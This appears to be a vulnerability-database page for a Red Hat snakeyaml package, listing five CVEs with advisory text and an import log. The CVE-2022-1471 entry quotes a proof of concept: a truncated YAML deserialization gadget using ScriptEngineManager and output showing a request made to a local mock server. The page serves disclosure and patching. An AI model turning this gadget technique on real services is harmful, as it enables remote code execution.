Staging Environment: Content and features may be unstable or change without notice.
Search for packages
Package details: pkg:rpm/redhat/eap7-snakeyaml@1.33.0-2.SP1_redhat_00001.1?arch=el9eap
purl pkg:rpm/redhat/eap7-snakeyaml@1.33.0-2.SP1_redhat_00001.1?arch=el9eap
Next non-vulnerable version None.
Latest non-vulnerable version None.
Risk 10.0
Vulnerabilities affecting this package (5)
Vulnerability Summary Fixed by
VCID-4s4f-emvn-9bhh
Aliases:
CVE-2022-45787
GHSA-q84x-3476-8ff2
Apache James MIME4J vulnerable to information disclosure to local users Unproper laxist permissions on the temporary files used by MIME4J TempFileStorageProvider may lead to information disclosure to other local users. This issue affects Apache James MIME4J version 0.8.8 and prior versions. We recommend users to upgrade to MIME4j version 0.8.9 or later. There are no reported fixed by versions.
VCID-dmkc-42vj-gbhc
Aliases:
CVE-2022-1471
GHSA-mjmj-j48q-9wg2
SnakeYaml Constructor Deserialization Remote Code Execution ### Summary SnakeYaml's `Constructor` class, which inherits from `SafeConstructor`, allows any type be deserialized given the following line: new Yaml(new Constructor(TestDataClass.class)).load(yamlContent); Types do not have to match the types of properties in the target class. A `ConstructorException` is thrown, but only after a malicious payload is deserialized. ### Severity High, lack of type checks during deserialization allows remote code execution. ### Proof of Concept Execute `bash run.sh`. The PoC uses Constructor to deserialize a payload for RCE. RCE is demonstrated by using a payload which performs a http request to http://127.0.0.1:8000. Example output of successful run of proof of concept: ``` $ bash run.sh [+] Downloading snakeyaml if needed [+] Starting mock HTTP server on 127.0.0.1:8000 to demonstrate RCE nc: no process found [+] Compiling and running Proof of Concept, which a payload that sends a HTTP request to mock web server. [+] An exception is expected. Exception: Cannot create property=payload for JavaBean=Main$TestDataClass@3cbbc1e0 in 'string', line 1, column 1: payload: !!javax.script.ScriptEn ... ^ Can not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager in 'string', line 1, column 10: payload: !!javax.script.ScriptEngineManag ... ^ at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:291) at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.construct(Constructor.java:172) at org.yaml.snakeyaml.constructor.Constructor$ConstructYamlObject.construct(Constructor.java:332) at org.yaml.snakeyaml.constructor.BaseConstructor.constructObjectNoCheck(BaseConstructor.java:230) at org.yaml.snakeyaml.constructor.BaseConstructor.constructObject(BaseConstructor.java:220) at org.yaml.snakeyaml.constructor.BaseConstructor.constructDocument(BaseConstructor.java:174) at org.yaml.snakeyaml.constructor.BaseConstructor.getSingleData(BaseConstructor.java:158) at org.yaml.snakeyaml.Yaml.loadFromReader(Yaml.java:491) at org.yaml.snakeyaml.Yaml.load(Yaml.java:416) at Main.main(Main.java:37) Caused by: java.lang.IllegalArgumentException: Can not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager at java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:167) at java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:171) at java.base/jdk.internal.reflect.UnsafeObjectFieldAccessorImpl.set(UnsafeObjectFieldAccessorImpl.java:81) at java.base/java.lang.reflect.Field.set(Field.java:780) at org.yaml.snakeyaml.introspector.FieldProperty.set(FieldProperty.java:44) at org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:286) ... 9 more [+] Dumping Received HTTP Request. Will not be empty if PoC worked GET /proof-of-concept HTTP/1.1 User-Agent: Java/11.0.14 Host: localhost:8000 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive ``` ### Further Analysis Potential mitigations include, leveraging SnakeYaml's SafeConstructor while parsing untrusted content. See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64581479 for discussion on the subject. ### Timeline **Date reported**: 4/11/2022 **Date fixed**: [30/12/2022](https://bitbucket.org/snakeyaml/snakeyaml/pull-requests/44) **Date disclosed**: 10/13/2022 There are no reported fixed by versions.
VCID-fb8u-g65k-hffs
Aliases:
CVE-2022-38752
GHSA-9w3m-gqgf-c4p9
snakeYAML before 1.32 vulnerable to Denial of Service due to Out-of-bounds Write Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DoS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack-overflow. There are no reported fixed by versions.
VCID-knw5-d2nn-vyhq
Aliases:
CVE-2022-41853
GHSA-77xx-rxvh-q682
HyperSQL DataBase vulnerable to remote code execution when processing untrusted input Those using `java.sql.Statement` or `java.sql.PreparedStatement` in hsqldb (HyperSQL DataBase) to process untrusted input may be vulnerable to a remote code execution attack. By default it is allowed to call any static method of any Java class in the classpath resulting in code execution. The issue can be prevented by updating to 2.7.1 or by setting the system property "hsqldb.method_class_names" to classes which are allowed to be called. For example, `System.setProperty("hsqldb.method_class_names", "abc")` or Java argument `-Dhsqldb.method_class_names="abc"` can be used. From version 2.7.1 all classes by default are not accessible except those in `java.lang.Math` and need to be manually enabled. There are no reported fixed by versions.
VCID-sqsn-ygsg-yfdu
Aliases:
CVE-2022-41854
GHSA-w37g-rhq8-7m4j
Snakeyaml vulnerable to Stack overflow leading to denial of service Those using Snakeyaml to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow. This effect may support a denial of service attack. There are no reported fixed by versions.
Vulnerabilities fixed by this package (0)
Vulnerability Summary Aliases
This package is not known to fix vulnerabilities.

Date Actor Action Vulnerability Source VulnerableCode Version
2026-04-01T13:57:15.682541+00:00 RedHat Importer Affected by VCID-fb8u-g65k-hffs https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-38752.json 38.0.0
2026-04-01T13:56:49.174280+00:00 RedHat Importer Affected by VCID-knw5-d2nn-vyhq https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-41853.json 38.0.0
2026-04-01T13:56:45.447993+00:00 RedHat Importer Affected by VCID-dmkc-42vj-gbhc https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-1471.json 38.0.0
2026-04-01T13:56:27.996455+00:00 RedHat Importer Affected by VCID-sqsn-ygsg-yfdu https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-41854.json 38.0.0
2026-04-01T13:55:54.205641+00:00 RedHat Importer Affected by VCID-4s4f-emvn-9bhh https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-45787.json 38.0.0